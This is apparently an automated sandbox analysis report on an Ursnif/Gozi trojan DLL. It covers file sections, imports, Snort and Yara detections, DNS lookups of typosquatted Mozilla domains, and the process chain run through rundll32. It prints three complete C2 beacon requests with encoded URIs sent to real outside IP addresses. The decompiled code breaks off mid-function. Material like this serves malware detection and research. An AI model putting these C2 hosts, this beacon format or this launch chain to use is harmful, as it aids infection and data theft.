              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x12ff00x13000False0.060623972039473686data0.9365886999938686IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x140000x764f70x77000False0.8262929195115546Matlab v4 mat-file (little endian) |\243\010, numeric, rows 1674392912, columns 0, imaginary7.243433987096487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x8b0000x6d770x5000False0.236572265625data4.672223129898148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x920000x5da0x1000False0.10009765625data1.0782869238822896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x930000x6430x1000False0.104736328125data0.9420067869452311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x940000x17e90x2000False0.300048828125data3.943275291049162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_VERSION0x931700x330data

              Imports

              DLLImport
              KERNEL32.dllWaitForSingleObjectEx, GetBinaryTypeW, GetModuleFileNameW, CloseHandle, GetCurrentThreadId
              OLEAUT32.dllGetRecordInfoFromGuids
              POWRPROF.dllReadPwrScheme
              USER32.dllUpdateWindow, SystemParametersInfoW, ChangeDisplaySettingsW
              SETUPAPI.dllSetupPromptForDiskW
              GDI32.dllSetMapperFlags
              msvcrt.dllmemset

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.680.77.23.7749728802033204 01/23/23-23:00:21.133917TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4972880192.168.2.680.77.23.77
              192.168.2.680.77.23.7749728802033203 01/23/23-23:00:21.133917TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4972880192.168.2.680.77.23.77
              192.168.2.680.77.25.10949733802033203 01/23/23-23:01:31.648906TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973380192.168.2.680.77.25.109
              192.168.2.680.77.25.10949733802033204 01/23/23-23:01:31.648906TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973380192.168.2.680.77.25.109
              192.168.2.6170.130.165.18249735802033203 01/23/23-23:02:42.232320TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973580192.168.2.6170.130.165.182
              192.168.2.6170.130.165.18249735802033204 01/23/23-23:02:42.232320TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973580192.168.2.6170.130.165.182

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 23, 2023 23:00:21.098488092 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:00:21.133186102 CET804972880.77.23.77192.168.2.6
              Jan 23, 2023 23:00:21.133444071 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:00:21.133917093 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:00:21.168118000 CET804972880.77.23.77192.168.2.6
              Jan 23, 2023 23:00:21.437371969 CET804972880.77.23.77192.168.2.6
              Jan 23, 2023 23:00:21.437592983 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:01:26.439805984 CET804972880.77.23.77192.168.2.6
              Jan 23, 2023 23:01:26.439996004 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:01:31.595170021 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:01:31.646770000 CET804973380.77.25.109192.168.2.6
              Jan 23, 2023 23:01:31.648447990 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:01:31.648905993 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:01:31.699809074 CET804973380.77.25.109192.168.2.6
              Jan 23, 2023 23:01:32.010314941 CET804973380.77.25.109192.168.2.6
              Jan 23, 2023 23:01:32.012904882 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:02:37.016978025 CET804973380.77.25.109192.168.2.6
              Jan 23, 2023 23:02:37.017112970 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:02:42.080226898 CET4973580192.168.2.6170.130.165.182
              Jan 23, 2023 23:02:42.231622934 CET8049735170.130.165.182192.168.2.6
              Jan 23, 2023 23:02:42.231807947 CET4973580192.168.2.6170.130.165.182
              Jan 23, 2023 23:02:42.232320070 CET4973580192.168.2.6170.130.165.182
              Jan 23, 2023 23:02:42.383585930 CET8049735170.130.165.182192.168.2.6
              Jan 23, 2023 23:02:42.828686953 CET8049735170.130.165.182192.168.2.6
              Jan 23, 2023 23:02:42.828810930 CET4973580192.168.2.6170.130.165.182
              Jan 23, 2023 23:02:55.699635029 CET4973380192.168.2.680.77.25.109
              Jan 23, 2023 23:02:55.699706078 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:02:55.750669003 CET804973380.77.25.109192.168.2.6
              Jan 23, 2023 23:02:56.011195898 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:02:56.620620012 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:02:57.823911905 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:03:00.230360031 CET4972880192.168.2.680.77.23.77
              Jan 23, 2023 23:03:05.043231010 CET4972880192.168.2.680.77.23.77

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 23, 2023 22:59:15.772371054 CET6291053192.168.2.68.8.8.8
              Jan 23, 2023 22:59:15.794097900 CET53629108.8.8.8192.168.2.6
              Jan 23, 2023 23:00:26.558520079 CET5394353192.168.2.68.8.8.8
              Jan 23, 2023 23:00:26.576061010 CET53539438.8.8.8192.168.2.6
              Jan 23, 2023 23:01:37.050565004 CET5891753192.168.2.68.8.8.8
              Jan 23, 2023 23:01:37.070890903 CET53589178.8.8.8192.168.2.6
              Jan 23, 2023 23:02:47.859919071 CET6252053192.168.2.68.8.8.8
              Jan 23, 2023 23:02:47.910687923 CET53625208.8.8.8192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 23, 2023 22:59:15.772371054 CET192.168.2.68.8.8.80x88e8Standard query (0)trackingg-protectioon.cdn4.mozilla.netA (IP address)IN (0x0001)false
              Jan 23, 2023 23:00:26.558520079 CET192.168.2.68.8.8.80xc04dStandard query (0)trackingg-protectioon.cdn4.mozilla.netA (IP address)IN (0x0001)false
              Jan 23, 2023 23:01:37.050565004 CET192.168.2.68.8.8.80x68c7Standard query (0)protectioon.cdn4.mozilla.netA (IP address)IN (0x0001)false
              Jan 23, 2023 23:02:47.859919071 CET192.168.2.68.8.8.80xd1c2Standard query (0)protectioon.cdn4.mozilla.netA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 23, 2023 22:59:15.794097900 CET8.8.8.8192.168.2.60x88e8Name error (3)trackingg-protectioon.cdn4.mozilla.netnonenoneA (IP address)IN (0x0001)false
              Jan 23, 2023 23:00:26.576061010 CET8.8.8.8192.168.2.60xc04dName error (3)trackingg-protectioon.cdn4.mozilla.netnonenoneA (IP address)IN (0x0001)false
              Jan 23, 2023 23:01:37.070890903 CET8.8.8.8192.168.2.60x68c7Name error (3)protectioon.cdn4.mozilla.netnonenoneA (IP address)IN (0x0001)false
              Jan 23, 2023 23:02:47.910687923 CET8.8.8.8192.168.2.60xd1c2Name error (3)protectioon.cdn4.mozilla.netnonenoneA (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • 80.77.23.77
              • 80.77.25.109
              • 170.130.165.182

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.64972880.77.23.7780C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 23, 2023 23:00:21.133917093 CET314OUTGET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 80.77.23.77
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:00:21.437371969 CET314INHTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:00:21 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.64973380.77.25.10980C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 23, 2023 23:01:31.648905993 CET343OUTGET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 80.77.25.109
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:01:32.010314941 CET344INHTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:01:31 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.649735170.130.165.18280C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 23, 2023 23:02:42.232320070 CET353OUTGET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 170.130.165.182
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:02:42.828686953 CET353INHTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:02:42 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\Zeip.dll"
              Imagebase:0x1110000
              File size:116736 bytes
              MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:1
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:2
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
              Imagebase:0x1b0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
              Imagebase:0xc40000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              General

              Target ID:5
              Start time:22:58:58
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:7
              Start time:22:58:59
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:9
              Start time:22:59:02
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:14.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:46.7%
                Total number of Nodes:15
                Total number of Limit Nodes:4
                execution_graph 156 401510 157 401511 156->157 158 401559 157->158 159 401370 3 API calls 157->159 159->157 146 401511 147 401516 146->147 148 401559 147->148 150 401370 147->150 151 40138e 150->151 152 4014c7 GetBinaryTypeW 151->152 153 401443 151->153 152->153 154 40144c 152->154 153->147 155 40147b memset ReadPwrScheme 154->155 155->153 160 40156a 161 401576 GetCurrentThreadId 160->161

                Callgraph

                Executed Functions

                Function 00401511 Relevance: .0, Instructions: 27COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 21 401511-401514 22 40153b-401557 21->22 23 401516-401534 22->23 24 401559-401564 22->24 23->22 25 401539 call 401370 23->25 25->22
                C-Code - Quality: 87%
                			E00401511(void* __eax, intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t8;
				intOrPtr _t9;
